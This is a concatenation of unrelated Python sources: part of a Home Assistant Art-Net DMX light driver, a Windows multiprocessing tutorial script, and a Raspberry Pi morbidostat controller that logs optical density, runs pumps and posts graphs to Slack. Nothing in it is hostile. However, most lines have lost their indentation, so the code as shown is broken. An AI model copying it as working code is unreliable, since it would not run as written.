@asyncio.coroutine
def async_turn_off(self, **kwargs):
"""Instruct the light to turn off. If a transition time has been specified in seconds
the controller will fade."""
transition = kwargs.get(ATTR_TRANSITION, self._fade_time)
logging.debug("Turning off '%s' with transition %i", self._name, transition)
asyncio.ensure_future(self._controller.set_channels_async(self._channels, 0, transition=transition))
self._state = False
self.async_schedule_update_ha_state()
def update(self):
"""Fetch update state."""
# Nothing to return
class DMXGateway(object):
"""
Class to keep track of the values of DMX channels and provide utilities to
send values to the DMX gateway.
"""
def __init__(self, host, port, default_level, number_of_channels):
"""
Initialise a bank of channels, with a default value specified by the caller.
"""
self._host = host
self._port = port
self._number_of_channels = number_of_channels
self._default_level = default_level
# Number of channels must be even
if number_of_channels % 2 != 0:
self._number_of_channels += 1
# Initialise the DMX channel array with the default values
self._channels = [self._default_level] * self._number_of_channels
# Initialise socket
self._socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # UDP
packet = bytearray()
packet.extend(map(ord, "Art-Net"))
packet.append(0x00) # Null terminate Art-Net
packet.extend([0x00, 0x50]) # Opcode ArtDMX 0x5000 (Little endian)
packet.extend([0x00, 0x0e]) # Protocol version 14
packet.extend([0x00, 0x00]) # Sequence, Physical
packet.extend([0x00, 0x00]) # Universe
packet.extend(pack('>h', self._number_of_channels)) # Pack the number of channels Big endian
self._base_packet = packet
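        # For reference, the 18-byte ArtDMX header assembled above is:
        #   "Art-Net\0"   (8 bytes, protocol ID)
        #   0x00 0x50     (ArtDMX opcode 0x5000, little endian)
        #   0x00 0x0e     (protocol version 14)
        #   0x00 0x00     (sequence, physical)
        #   0x00 0x00     (universe)
        #   2 bytes       (channel count, big endian via pack('>h', ...))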
        # start sending Art-Net frames in the background
        self.stopThread = False
        thread = Thread(target=self.send, daemon=True)  # daemon so it never blocks interpreter exit
        thread.start()
def send(self):
"""
Send the current state of DMX values to the gateway via UDP packet.
"""
while True:
# Copy the base packet then add the channel array
packet = self._base_packet[:]
packet.extend(self._channels)
self._socket.sendto(packet, (self._host, self._port))
# logging.debug("Sending Art-Net frame")
time.sleep(1. / 40)
def set_channels(self, channels, value, send_immediately=True):
# Single value for standard channels, RGB channels will have 3 or more
        value_arr = value if isinstance(value, (tuple, list)) else [value]
for x, channel in enumerate(channels):
default_value = value_arr[min(x, len(value_arr) - 1)]
self._channels[channel - 1] = default_value
# if send_immediately:
# self.send()
@asyncio.coroutine
def set_channels_async(self, channels, value, transition=0, fps=40, send_immediately=True):
original_values = self._channels[:]
# Minimum of one frame for a snap transition
number_of_frames = max(int(transition * fps), 1)
# Single value for standard channels, RGB channels will have 3 or more
        value_arr = value if isinstance(value, (tuple, list)) else [value]
for i in range(1, number_of_frames + 1):
values_changed = False
for x, channel in enumerate(channels):
target_value = value_arr[min(x, len(value_arr) - 1)]
increment = (target_value - original_values[channel - 1]) / (number_of_frames)
next_value = int(round(original_values[channel - 1] + (increment * i)))
if self._channels[channel - 1] != next_value:
self._channels[channel - 1] = next_value
values_changed = True
# if values_changed and send_immediately:
# self.send()
yield from asyncio.sleep(1. / fps)
def get_channel_level(self, channel):
"""
Return the current value we have for the specified channel.
"""
return self._channels[int(channel) - 1]
def set_channel_rgb(self, channel, values, send_immediately=True):
for i in range(0, len(values)):
            _LOGGER.debug('Setting channel %i to %i with send immediately = %s', channel + i, values[i], send_immediately)
if (channel + i <= self._number_of_channels) and (0 <= values[i] <= 255):
self._channels[channel - 1 + i] = values[i]
# if send_immediately is True:
# self.send()
return True
@property
def default_level(self):
return self._default_level
def scale_rgb_to_brightness(rgb, brightness):
brightness_scale = (brightness / 255)
scaled_rgb = [round(rgb[0] * brightness_scale),
round(rgb[1] * brightness_scale),
round(rgb[2] * brightness_scale)]
return scaled_rgb
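# Worked example (illustrative): scale_rgb_to_brightness([255, 128, 0], 128)
# scales each component by 128/255 and returns [128, 64, 0].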
Episode 08 - Multiprocessing in Windows.py
import time
from multiprocessing import Process
def ask_user():
start = time.time()
user_input = input('Enter your name: ')
greet = f'Hello {user_input}, nice to see you here..!'
print(greet)
print(f'ask_user, {time.time() - start}')
def complex_calculation():
start = time.time()
print('Started Calculating..!')
[x**2 for x in range(20000000)]
print(f'complex_calculation, {time.time() - start}')
if __name__ == '__main__':
    # run the single-threaded baseline first for comparison
    start = time.time()
    ask_user()
    complex_calculation()
    print(f'Single thread total time : {time.time() - start}')
process = Process(target=complex_calculation)
process2 = Process(target=ask_user)
process.start()
process2.start()
start = time.time()
process.join()
process2.join()
print(f'Two processes total time: {time.time() - start}')
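    # Note (illustrative): Windows uses the "spawn" start method, so each child
    # process re-imports this module; the __main__ guard above prevents the
    # module-level demo calls from running again inside every child.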
master.py
#!/usr/bin/python3
import time
import sys
from datetime import datetime
import csv
import threading
from multiprocessing import Process
import configparser
import fileinput
import RPi.GPIO as GPIO
import numpy as np
import os
import board
import busio
import adafruit_ads1x15.ads1015 as ADS
import adafruit_ads1x15.ads1115 as ADS_HR
from adafruit_ads1x15.analog_in import AnalogIn
from adafruit_mcp230xx.mcp23017 import MCP23017
import digitalio
import pandas as pd
import matplotlib.pyplot as plt
from scipy import signal
# Needed for Slack Integration
# import slack
from slackclient import SlackClient
#Logging
import logging
import plotter
import glob
mstart_time = datetime.now()
config = configparser.ConfigParser()
config.read('eve-conf.ini')
totsys = (''.join(config.sections())).count('CU')
actsys = []
for sysiter in range(totsys):
if config['CU' + str(sysiter+1)].getboolean('enabled'):
actsys.append(sysiter+1)
# slack_client = slack.WebClient(token = config['MAIN']['slack_key'])
slack_client = SlackClient(config['MAIN']['slack_key'])
if slack_client.rtm_connect():
print ('Multiplexer Started.')
if (totsys == 1):
multimess = slack_client.api_call(
"chat.postMessage",
username = config['MAIN']['hostname'],
icon_url = config['MAIN']['multi_icon'],
channel=config['MAIN']['slack_channel'],
text = mstart_time.strftime('Started at %H:%M:%S on %a - %b %d, %Y. There is ' + str(totsys) + ' system configured.')
)
else:
multimess = slack_client.api_call(
"chat.postMessage",
username = config['MAIN']['hostname'],
icon_url = config['MAIN']['multi_icon'],
channel=config['MAIN']['slack_channel'],
text = mstart_time.strftime('Started at %H:%M:%S on %a - %b %d, %Y. There are ' + str(totsys) + ' systems configured.')
)
else:
sys.exit("No connection to Slack.")
chanid = multimess['channel']
multits = multimess['ts']
i2c_lock = [0]*totsys
i2c_q = []
graph_lock = [0]*totsys
graph_q = []
morbidostats = list()
comb_mesg = []
comb_saveloc = ''
comb_lat_sw = ['First','']
if config['MAIN'].getboolean('temp_sensor'): temp = 0.0
odcsvs = []
pumpcsvs = []
def IC_init():
adc = list()
gpioe = list()
adc_add = list()
gpio_add = list()
for sysitr in range(totsys):
sysnum = sysitr + 1
confsec = 'CU' + str(sysnum)
if config[confsec].getboolean('enabled'):
adc_add.append(config[confsec].getint('a_address'))
if not config[confsec].getboolean('Pi_pins'):
gpio_add.append(config[confsec].getint('m_address'))
adc_add = list(set(adc_add))
gpio_add = list(set(gpio_add))
i2c = busio.I2C(board.SCL, board.SDA)
if adc_add:
for add in adc_add:
if config['MAIN'].getboolean('ads1115'):
adc.append(ADS_HR.ADS1115(i2c, address = add))
else:
adc.append(ADS.ADS1015(i2c, address = add))
if gpio_add:
for add in gpio_add:
gpioe.append(MCP23017(i2c, address = add))
return {'adc':adc, 'gpioe':gpioe, 'adc_add':adc_add, 'gpio_add':gpio_add}
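# Note: IC_init() deduplicates the configured I2C addresses, so CUs sharing an
# ADC or MCP23017 expander reuse one driver object; each Morbidostat later
# resolves its chip via adc_add.index(...) / gpio_add.index(...).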
def eve_starter():
for sysitr in range(totsys):
sysnum = sysitr + 1
confsec = 'CU' + str(sysnum)
if config[confsec].getboolean('enabled') is True:
print (confsec + ' enabled.')
if config['MAIN'].getboolean('repeat1_evar'):
morbidostats.append([Morbidostat([sysnum, 1], len(actsys), chips, slack_client), sysnum])
else:
morbidostats.append([Morbidostat([sysnum, sysnum], len(actsys), chips, slack_client), sysnum])
#Morbidostat(sysnum)
# thread.join
else:
print (confsec + ' not enabled. Skipping.')
slackms = slack_client.api_call(
"chat.postMessage",
username = config['MAIN']['hostname'],
icon_url = config['MAIN']['multi_icon'],
channel = config['MAIN']['slack_channel'],
text = confsec + ' is not enabled. Skipping.'
)
print ('Starting CUs')
for starti in range(len(morbidostats)):
morbidostats[starti][0].start()
if config['MAIN'].getboolean('comb_graph') and len(actsys) > 1:
combgen = slack_client.api_call(
"chat.postMessage",
username = config['MAIN']['hostname'],
icon_url = config['MAIN']['multi_icon'],
channel = config['MAIN']['slack_channel'],
text = 'Combined Graphs'
)
comblat = slack_client.api_call(
"chat.postMessage",
username = config['MAIN']['hostname'],
icon_url = config['MAIN']['multi_icon'],
channel = config['MAIN']['slack_channel'],
text = 'Latest Combined Graphs'
)
global comb_mesg
comb_mesg = [combgen['ts'], comblat['ts']]
def graph_controller():
    while True:
        if len(graph_q) == 0:
            time.sleep(20)
        else:
            if graph_q[0] == 'C':
                comb_grapher()
            else:
                morbidostats[graph_q[0]][0].graphOD()
            graph_q.pop(0)
def i2c_controller():
    while True:
        if len(i2c_q) == 0:
            time.sleep(0.05)
        else:
            if i2c_q[0][1] == 'O':
                morbidostats[int(i2c_q[0][0])][0].get_OD()
            elif i2c_q[0][1] == 'C':
                morbidostats[int(i2c_q[0][0])][0].control_alg()
            i2c_q.pop(0)
def live_plotter():
max_time = 0
for sysitr in range(totsys):
sysnum = sysitr + 1
confsec = 'CU' + str(sysnum)
if config[confsec].getboolean('enabled') is True:
temp_time = config[confsec].getfloat('time_between_saves')
if temp_time > max_time:
max_time = temp_time
time.sleep(max_time*60+5)
global odcsvs
global pumpcsvs
for starti in range(len(morbidostats)):
temp_locs = morbidostats[starti][0].file_locs()
odcsvs.append(temp_locs['ods'])
pumpcsvs.append(temp_locs['pumps'])
Process(target = plotter.Plotter, args = (actsys, odcsvs, pumpcsvs, config['MAIN']['hostname'])).start()
if config['MAIN'].getboolean('comb_graph') and len(actsys) > 1: threading.Thread(target = comb_graph_scheduler).start()
def comb_graph_scheduler():
global comb_saveloc
root_dir = config['MAIN']['save_location']
comb_saveloc = root_dir + '/Combined/' + str(datetime.now()) + '/'
os.makedirs(comb_saveloc)
while True:
time.sleep(config['MAIN'].getfloat('comb_graph_freq')*60)
global graph_q
graph_q.append('C')
def comb_grapher():
ods = []
leg = []
print('Generating Combined Graphs')
fig = plt.figure(dpi=140)
ax = plt.gca()
for i in actsys: leg.append('CU'+str(i))
for i in odcsvs:
ods.append(pd.read_csv(i,index_col='hour'))
ods[-1][['average']].plot(ax=ax,figsize=(7,5))
ax.legend(leg)
ax.set_ylabel('Raw OD')
ax.set_xlabel('Time(h)')
global comb_saveloc
fig.savefig(comb_saveloc + 'RawOD.png')
plt.close('all')
fig = None; ax = None
fig2 = plt.figure(dpi=140)
ax2 = plt.gca()
for i in ods:
i[['average']].divide(float(i.iloc[-1][['maxod']])).plot(ax=ax2,figsize=(7,5))
ax2.legend(leg)
ax2.set_ylabel('Scaled OD')
ax2.set_xlabel('Time(h)')
fig2.savefig(comb_saveloc + 'ScaledOD.png')
plt.close('all')
fig2 = None; ax2 = None
global comb_mesg
global comb_lat_sw
with open(comb_saveloc + 'RawOD.png', "rb") as file_content:
combgen_pic = slack_client.api_call(
"files.upload",
channels = config['MAIN']['slack_channel'],
thread_ts = comb_mesg[0],
title = "RawOD",
file = file_content
)
with open(comb_saveloc + 'ScaledOD.png', "rb") as file_content:
combgen_pics = slack_client.api_call(
"files.upload",
channels = config['MAIN']['slack_channel'],
thread_ts = comb_mesg[0],
title = "ScaledOD",
file = file_content
)
    if comb_lat_sw[0] == 'First':
with open(comb_saveloc + 'RawOD.png', "rb") as file_content:
comblat_pic = slack_client.api_call(
"files.upload",
channels = config['MAIN']['slack_channel'],
thread_ts = comb_mesg[1],
title = "RawOD",
file = file_content
)
with open(comb_saveloc + 'ScaledOD.png', "rb") as file_content:
comblat_pics = slack_client.api_call(
"files.upload",
channels = config['MAIN']['slack_channel'],
thread_ts = comb_mesg[1],
title = "RawOD",
file = file_content
)
comb_lat_sw = [comblat_pic['file']['shares']['public'][chanid][0]['ts'], comblat_pics['file']['shares']['public'][chanid][0]['ts']]
else:
delcomb = slack_client.api_call(
"chat.delete",
channel = chanid,
ts = comb_lat_sw[0]
)
delcombs = slack_client.api_call(
"chat.delete",
channel = chanid,
ts = comb_lat_sw[1]
)
with open(comb_saveloc + 'RawOD.png', "rb") as file_content:
comblat_pic = slack_client.api_call(
"files.upload",
channels = config['MAIN']['slack_channel'],
thread_ts = comb_mesg[1],
title = "RawOD",
file = file_content
)
with open(comb_saveloc + 'ScaledOD.png', "rb") as file_content:
comblat_pics = slack_client.api_call(
"files.upload",
channels = config['MAIN']['slack_channel'],
thread_ts = comb_mesg[1],
title = "RawOD",
file = file_content
)
comb_lat_sw = [comblat_pic['file']['shares']['public'][chanid][0]['ts'], comblat_pics['file']['shares']['public'][chanid][0]['ts']]
def temp_sensor_func():
base_dir = '/sys/bus/w1/devices/'
device_folder = glob.glob(base_dir + '28*')[0]
device_file = device_folder + '/w1_slave'
    while True:
        with open(device_file, 'r') as f:
            lines = f.readlines()
        # re-read until the 1-wire CRC check line ends in 'YES'
        while lines[0].strip()[-3:] != 'YES':
            time.sleep(0.2)
            with open(device_file, 'r') as f:
                lines = f.readlines()
equals_pos = lines[1].find('t=')
if equals_pos != -1:
temp_string = lines[1][equals_pos+2:]
global temp
temp = float(temp_string) / 1000.0
time.sleep(3)
class Morbidostat:
def __init__(self, sysnum, actsys, chips, slack_client):
self.printing = False
self.sysnum = sysnum[0]
self.varnum = sysnum[1]
self.actsys = actsys
self.adc= chips['adc']
self.gpioe = chips['gpioe']
self.adc_add = chips['adc_add']
self.gpio_add = chips['gpio_add']
self.sysstr = 'CU' + str(self.sysnum)
self.varstr = 'CU' + str(self.varnum)
self.threads = {}
self.thread_locks = {'save' : threading.Lock(), 'adc' : threading.Lock(), 'dynL' : threading.Lock(), 'control_alg' : threading.Lock(), 'graphs' : threading.Lock(), 'threads' : threading.Lock()}
self.config = configparser.ConfigParser()
self.config.read('eve-conf.ini')
# Define Experiment Variables
self.time_between_pumps = self.config[self.varstr].getfloat('time_between_pumps')
self.OD_thr = self.config[self.varstr].getfloat('OD_thr')
self.OD_thr_set = False
self.OD_min = self.config[self.varstr].getfloat('OD_min')
self.OD_err = self.config[self.varstr].getfloat('OD_error')
self.time_between_ODs = self.config[self.varstr].getfloat('time_between_ODs') # how often to gather OD data, in seconds
self.time_between_graphs = self.config[self.varstr].getfloat('time_between_graphs') # how often to graph, in minutes
# OD_thr is the threshold above which to activate drug pump [vish bench tests: empty: 3.5V, Clear Vial: 0.265V, Very Cloudy Vial: 2.15V]
#time_between_writes = 1 # how often to write out OD data, in minutes
#loops_between_writes = (time_between_writes*60)/time_between_ODs # time bewteen writes in loops
self.time_between_saves = self.config[self.varstr].getfloat('time_between_saves')
# Set Up I2C to Read OD Data
# Create the I2C bus
self.P_drug_times = self.config[self.varstr].getfloat('P_drug_times')
self.drug_pump_flo_rate = self.config[self.varstr].getfloat('drug_pump_flo_rate')
self.P_nut_times = self.config[self.varstr].getfloat('P_nut_times')
self.nut_pump_flo_rate = self.config[self.varstr].getfloat('nut_pump_flo_rate')
self.P_waste_times = self.config[self.varstr].getfloat('P_waste_times')
self.waste_pump_flo_rate = self.config[self.varstr].getfloat('waste_pump_flo_rate')
self.running_data = [] # the list which will hold our 2-tuples of time and OD
self.pump_data = []
self.OD_tmplist = []
self.pump_tmplist = []
self.hr_OD_tmplist = []
self.hr_pump_tmplist = []
self.root_dir = self.config['MAIN']['save_location']
# self.currOD = np.zeros(num_cham)
self.currOD = 0
# averaged OD value
self.scaling = self.config[self.varstr].getboolean('scaling')
self.avOD = 0
self.maxOD = 0
# self.OD_av_length = self.config[self.varstr].getint('OD_av_length')
# # OD averaging buffer
# self.avOD_buffer = [0] * self.OD_av_length #need to change for multiplexing
self.filtwindow = signal.firwin(self.config[self.varstr].getint('length_of_od_filter'), self.config[self.varstr].getfloat('low_pass_corner_frequ'), fs = 1/self.time_between_ODs)
self.window = signal.lfilter_zi(self.filtwindow , 1)
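        # The FIR window plus the lfilter_zi state kept in self.window lets
        # get_OD() stream one OD sample per call through signal.lfilter
        # without refiltering the whole history.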
self.thresh_check = self.config[self.varstr].getfloat('time_thresh')
self.growthOD = []
self.growthrate = []
self.growthrate2 = []
self.growthrate_t = []
self.avefac = 30
self.instant_gr = 0
self.instant_gr2 = 0
self.graph_loops = self.actsys * self.config['MAIN'].getint('graph_resolution_fac')
self.elapsed_loop_time = 0
self.loops = 0
self.last_dilutionOD = 0
self.nut = 0
self.drug = 1
self.waste = 2
self.max_nut = self.nut
self.max_drug = self.drug
self.max_waste = self.waste
self.vial_drug_mass = 0
self.culture_vol = self.config[self.varstr].getint('culture_vol')
self.pump_act_times = []
self.dil_rate = 0
self.max_dil_rate = 0
self.temp_sensor = self.config['MAIN'].getboolean('temp_sensor')
self.total_time = self.config[self.varstr].getfloat('Exp_time_hours')*3600 #in seconds
self.loops_between_ODs = 1
self.loops_between_pumps = (self.time_between_pumps*60)/self.time_between_ODs # time between pumps in loops
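        # e.g. time_between_pumps = 10 (min) and time_between_ODs = 5 (s)
        # gives (10 * 60) / 5 = 120 OD loops between pump events (illustrative).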
# num_cham = 1 # number of morbidostat vials being used
if config['MAIN'].getboolean('ads1115'):
self.photod = AnalogIn(self.adc[self.adc_add.index(self.config[self.sysstr].getint('a_address'))], getattr(ADS_HR,'P'+ str(self.config[self.sysstr].getint('Analogin'))))
else:
self.photod = AnalogIn(self.adc[self.adc_add.index(self.config[self.sysstr].getint('a_address'))], getattr(ADS,'P'+ str(self.config[self.sysstr].getint('Analogin'))))
# Setup the GPIO Pins to Control the Pumps
self.pipins = self.config[self.sysstr].getboolean('pi_pins')
self.P_drug_pins = self.config[self.sysstr].getint('P_drug_pins')
self.P_nut_pins = self.config[self.sysstr].getint('P_nut_pins')
self.P_waste_pins = self.config[self.sysstr].getint('P_waste_pins')
self.P_LED_pins = self.config[self.sysstr].getint('P_led_pins')
self.pin_list = [self.P_drug_pins, self.P_nut_pins, self.P_waste_pins, self.P_LED_pins]
self.ledind = self.config[self.sysstr]['P_ind_pins'].isdigit()
if self.ledind:
self.P_ind_pins = self.config[self.sysstr].getint('P_ind_pins')
self.pin_list.append(self.P_ind_pins)
self.init_pins(self.pin_list)
self.init_time = datetime.now()
self.drug_name = self.config[self.varstr]['drug']
self.drug_conc = self.config[self.varstr].getfloat('drug_conc')
self.drug_vol = self.config[self.varstr].getfloat('drug_vol')
self.slack_client = SlackClient(self.config['MAIN']['slack_key'])
# self.slack_client = slack.WebClient(token = config['MAIN']['slack_key'])
self.slack_usericon = self.config[self.sysstr]['slack_icon']
self.chan = self.config['MAIN']['slack_channel']
if self.P_drug_times * self.drug_pump_flo_rate != self.P_waste_times * self.waste_pump_flo_rate or self.P_nut_times * self.nut_pump_flo_rate != self.P_waste_times * self.waste_pump_flo_rate:
print('[%s] WARNING: Net volume of the CU will change over time with the currently configured pump times.' % self.sysstr)
volwarn = self.slack_client.api_call(
"chat.postMessage",
channel = self.chan,
username=self.sysstr,
icon_url = self.slack_usericon,
text = 'WARNING: Net volume of the CU will change over time with the currently configured pump times.'
)
initmsg = self.slack_client.api_call(
"chat.postMessage",
channel = self.chan,
username=self.sysstr,
icon_url = self.slack_usericon,
text = self.init_time.strftime('Initialized at %H:%M:%S')
)
def start(self):
self.start_time = datetime.now()
        if self.root_dir[-1] == '/': self.root_dir = self.root_dir[:-1]
os.makedirs(self.root_dir + "/" + self.sysstr + "/" + str(self.start_time))
# self.elogr = logging.getLogger('self.elogr')
# self.elogr.setLevel(logging.DEBUG)
# self.elogrfh = logging.FileHandler('%s/%s/%s/exceptions.txt' % (self.root_dir, self.sysstr, self.start_time))
# self.elogrfh.setFormatter("%(asctime)s — %(name)s — %(levelname)s — %(message)s")
# self.elogr.addHandler(self.elogrfh)
# self.ilogr = logging.getLogger('self.ilogr')
# self.ilogr.setLevel(logging.INFO)
# self.ilogrfh = logging.FileHandler('%s/%s/%s/info.txt' % (self.root_dir, self.sysstr, self.start_time))
# self.ilogrfh.setFormatter("%(asctime)s — %(name)s — %(levelname)s — %(message)s")
# self.ilogr.addHandler(self.ilogrfh)
self.outfile_OD = "%s/%s/%s/ODdata_%s.csv" % (self.root_dir, self.sysstr, self.start_time, self.start_time)
file = open(self.outfile_OD, 'a')
wr = csv.writer(file)
# wr.writerow(['Current OD', 'Average OD','OD Timing'])
if self.temp_sensor:
wr.writerow(['current','average','maxod','time','hour','temp','threads','min'])
else:
wr.writerow(['current','average','maxod','time','hour','threads','min'])
file.close()
self.outfile_pump = "%s/%s/%s/pump_%s.csv" % (self.root_dir, self.sysstr, self.start_time, self.start_time)
file = open(self.outfile_pump, 'a')
wr = csv.writer(file)
# wr.writerow(['Nutrient Pump', 'Drug Pump','Waste Pump','Pump Timing', 'Drug Mass'])
wr.writerow(['media', 'drug','waste','pump_time','hour','vial_drug_mass','dil_rate'])
file.close()
#Detailed Files
self.hr_outfile_OD = "%s/%s/%s/hr_ODdata_%s.csv" % (self.root_dir, self.sysstr, self.start_time, self.start_time)
file = open(self.hr_outfile_OD, 'a')
wr = csv.writer(file)
# wr.writerow(['Current OD', 'Average OD','OD Timing'])
if self.temp_sensor:
wr.writerow(['current','average','maxod','time','hour','temp','threads','min'])
else:
wr.writerow(['current','average','maxod','time','hour','threads','min'])
file.close()
self.hr_outfile_pump = "%s/%s/%s/hr_pump_%s.csv" % (self.root_dir, self.sysstr, self.start_time, self.start_time)
file = open(self.hr_outfile_pump, 'a')
wr = csv.writer(file)
# wr.writerow(['Nutrient Pump', 'Drug Pump','Waste Pump','Pump Timing', 'Drug Mass'])
wr.writerow(['media', 'drug','waste','pump_time','hour','vial_drug_mass','dil_rate'])
file.close()
#TURN ON THE FAN HERE
# print('Experiment begun at %02s:%02s:%02s' % (self.start_time.hour, self.start_time.minute, self.start_time.second))
print(self.start_time.strftime(self.sysstr + ' started at %H:%M:%S on %a - %b %d, %Y'))
# self.ilogr.info(self.start_time.strftime(self.sysstr + ' started at %H:%M:%S on %a - %b %d, %Y'))
threading.Thread(target=self.on_timer).start()
self.initalmessage = self.slack_client.api_call(
"chat.postMessage",
channel = self.chan,
username=self.sysstr,
icon_url = self.slack_usericon,
text = self.start_time.strftime('Experiment started at %H:%M:%S on %a - %b %d, %Y')
)
self.recgra = self.slack_client.api_call(
"chat.postMessage",
channel = self.chan,
username=self.sysstr,
icon_url = self.slack_usericon,
text = self.start_time.strftime('Most recent graphs')
)
# self.history = self.slack_client.api_call("channels.history", channel=self.chanid, count = 1)
# self.threadts = self.history['messages'][0]['ts']
self.chanid = self.initalmessage['channel']
self.threadts = self.initalmessage['ts']
self.recgrats = self.recgra['ts']
self.firstrec = True
self.selection = self.config[self.varstr]['selection_alg']
self.vial_conc = self.config[self.varstr].getfloat('vial_conc')
def init_pins(self,pin_list):
if self.pipins:
GPIO.setmode(GPIO.BCM)
for pin in pin_list:
GPIO.setup(pin, GPIO.OUT)
else:
self.pins = [None]*(max(pin_list)+1)
self.mcp = self.gpioe[self.gpio_add.index(self.config[self.sysstr].getint('m_address'))]
for pin in self.pin_list:
self.pins[pin] = self.mcp.get_pin(pin)
self.pins[pin].direction = digitalio.Direction.OUTPUT
self.pins[pin].value = False
def get_OD(self):
print_buffer = 0
        if self.ledind:
            self.init_pins([self.P_LED_pins, self.P_ind_pins])
        else:
            self.init_pins([self.P_LED_pins])
try:
if self.pipins:
GPIO.output(self.P_LED_pins,1)
if self.ledind: GPIO.output(self.P_ind_pins,1)
else:
self.pins[self.P_LED_pins].value = True
if self.ledind: self.pins[self.P_ind_pins].value = True
time.sleep(0.1)
self.currOD = self.photod.voltage #np.asarray(self.value)#[0]
time.sleep(0.1)
if self.pipins:
GPIO.output(self.P_LED_pins,0)
if self.ledind: GPIO.output(self.P_ind_pins,0)
else:
self.pins[self.P_LED_pins].value = False
if self.ledind: self.pins[self.P_ind_pins].value = False
        except Exception:
            print('[%s] OD - WARNING ADC REQUEST CRASHED' % self.sysstr)
# self.avOD_buffer = self.avOD_buffer + [self.currOD]
# self.avOD_buffer.pop(0)
# self.avOD = sum(self.avOD_buffer)/len(self.avOD_buffer)
[self.avOD], self.window = signal.lfilter(self.filtwindow, 1, [self.currOD], zi = self.window)
if self.avOD > self.maxOD: self.maxOD = self.avOD
self.thread_locks['adc'].release()
def pump_on(self,pump):
if self.pipins:
GPIO.output(pump, 1)
else:
self.pins[pump].value = True
print('[%s] Turning on pump %s' % (self.sysstr,pump))
def pump_off(self,pump):
if self.pipins:
GPIO.output(pump, 0)
else:
self.pins[pump].value = False
print('[%s] Turning off pump %s' % (self.sysstr,pump))
    def all_pump_off(self):
        if self.pipins:
            for i in self.pin_list:
                GPIO.output(i, 0)
        else:
            for i in self.pin_list:
                self.pins[i].value = False
        print('[%s] Turning off all pumps' % self.sysstr)
def file_locs(self):
return {'ods':self.outfile_OD, 'pumps': self.outfile_pump}
def bufferdata(self):
if self.temp_sensor:
global temp
odlist = [self.currOD, self.avOD, self.maxOD, self.nows, (self.elapsed_time.total_seconds())/3600, temp, self.active_threads, self.OD_min]
self.hr_OD_tmplist.append(odlist)
else:
odlist = [self.currOD, self.avOD, self.maxOD, self.nows, (self.elapsed_time.total_seconds())/3600, self.active_threads, self.OD_min]
self.hr_OD_tmplist.append(odlist)
pulist = [self.nut,self.drug,self.waste,self.nows,(self.elapsed_time.total_seconds())/3600,self.vial_drug_mass,self.dil_rate]
self.hr_pump_tmplist.append(pulist)
if self.max_nut < self.nut: self.max_nut = self.nut
if self.max_drug < self.drug: self.max_drug = self.drug
if self.max_waste < self.waste: self.max_waste = self.waste
if self.max_dil_rate < self.dil_rate: self.max_dil_rate = self.dil_rate
self.nut = 0
self.drug = 1
self.waste = 2
if (self.loops % self.graph_loops) == 0:
pulist = [self.max_nut,self.max_drug,self.max_waste,self.nows,(self.elapsed_time.total_seconds())/3600,self.vial_drug_mass,self.max_dil_rate]
self.OD_tmplist.append(odlist)
self.pump_tmplist.append(pulist)
self.max_nut = self.nut
self.max_drug = self.drug
self.max_waste = self.waste
self.max_dil_rate = self.dil_rate
def savefunc(self):
self.thread_locks['save'].acquire()
self.bufferdata()
with open(self.hr_outfile_OD, 'a') as file:
wr = csv.writer(file)
wr.writerows(self.hr_OD_tmplist)
with open(self.hr_outfile_pump, 'a') as file:
wr = csv.writer(file)
wr.writerows(self.hr_pump_tmplist)
with open(self.outfile_OD, 'a') as file:
wr = csv.writer(file)
wr.writerows(self.OD_tmplist)
with open(self.outfile_pump, 'a') as file:
wr = csv.writer(file)
wr.writerows(self.pump_tmplist)
self.OD_tmplist = []
self.pump_tmplist = []
self.hr_OD_tmplist = []
self.hr_pump_tmplist = []
self.thread_locks['save'].release()
def graphOD(self):
print('[%s] Generating graph' % self.sysstr)
try:
elapmsg = self.slack_client.api_call(
"chat.postMessage",
channel = self.chan,
username=self.sysstr,
icon_url = self.slack_usericon,
text = ('Elapsed Time: %s ; OD = %.3f' % (self.secondsToText(int(self.elapsed_time.total_seconds())),self.avOD)),
thread_ts = self.threadts
)
allODs = pd.read_csv(self.outfile_OD, index_col='hour')
if self.scaling: allODs[['average']] = allODs[['average']]/float(allODs[['maxod']].iloc[-1])
if self.scaling: allODs[['min']] = allODs[['min']]/float(allODs[['maxod']].iloc[-1])
# allODs['hour'] = allODs['time'] - allODs['time'].iloc[0]
# allODs['hour'] = allODs['hour'].divide(3600)
# allODs.set_index('hour')
# print(allODs)
#fig = plt.figure(dpi=1000)
plt.rcParams["figure.dpi"] = 200
ODplt = (allODs[['average']]).plot() #figsize=(10,10) in the plot
# ODplt = (allODs[['current']]).plot() #figsize=(10,10) in the plot
ODfig = ODplt.get_figure()
self.outfile_OD = "%s/%s/%s/ODdata_%s.csv" % (self.root_dir, self.sysstr, self.start_time, self.start_time)
ODfig.savefig("%s/%s/%s/ODplot_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time))
ODfig.clf(); ODplt = None; ODfig = None; fig = None
with open("%s/%s/%s/ODplot_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), "rb") as file_content:
odmsg = self.slack_client.api_call(
"files.upload",
channels = self.chan,
thread_ts = self.threadts,
title = "ODPlot",
file = file_content
)
allpumps = pd.read_csv(self.outfile_pump, index_col='hour') # cols: 'media', 'drug','waste','pump_time','hour','vial_drug_mass'
allconcs = allpumps[['vial_drug_mass']]/self.culture_vol
allconcs.rename(columns={'vial_drug_mass':'drug_conc'}, inplace=True)
# allODs['hour'] = allODs['time'] - allODs['time'].iloc[0]
# allODs['hour'] = allODs['hour'].divide(3600)
# allODs.set_index('hour')
# print(allODs)
#fig = plt.figure(dpi=1000)
plt.rcParams["figure.dpi"] = 200
ODplt = (allODs[['average']]).plot(label='average', color='tab:blue') #figsize=(10,10) in the plot
ODplt.set_ylabel(ylabel='Average OD')
lines, labels = ODplt.get_legend_handles_labels()
DM = ODplt.twinx()
DM.spines['right'].set_position(('axes', 1.0))
allconcs.plot(ax = DM, label='vial_drug_mass',color='tab:orange',legend=False)
DM.set_ylabel('%s Concentration (ug/mL)' % self.drug_name.capitalize())
line, label = DM.get_legend_handles_labels()
lines += line
labels += label
ODplt.legend(lines, labels, loc=2)
# ODplt = (allODs[['current']]).plot() #figsize=(10,10) in the plot
ODfig = ODplt.get_figure()
ODfig.savefig("%s/%s/%s/ODconc_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), bbox_inches='tight')
ODfig.clf(); ODplt.figure = None; ODplt = None; ODfig = None; fig = None; allconcs= None; colors = None; DM = None
plt.close('all')
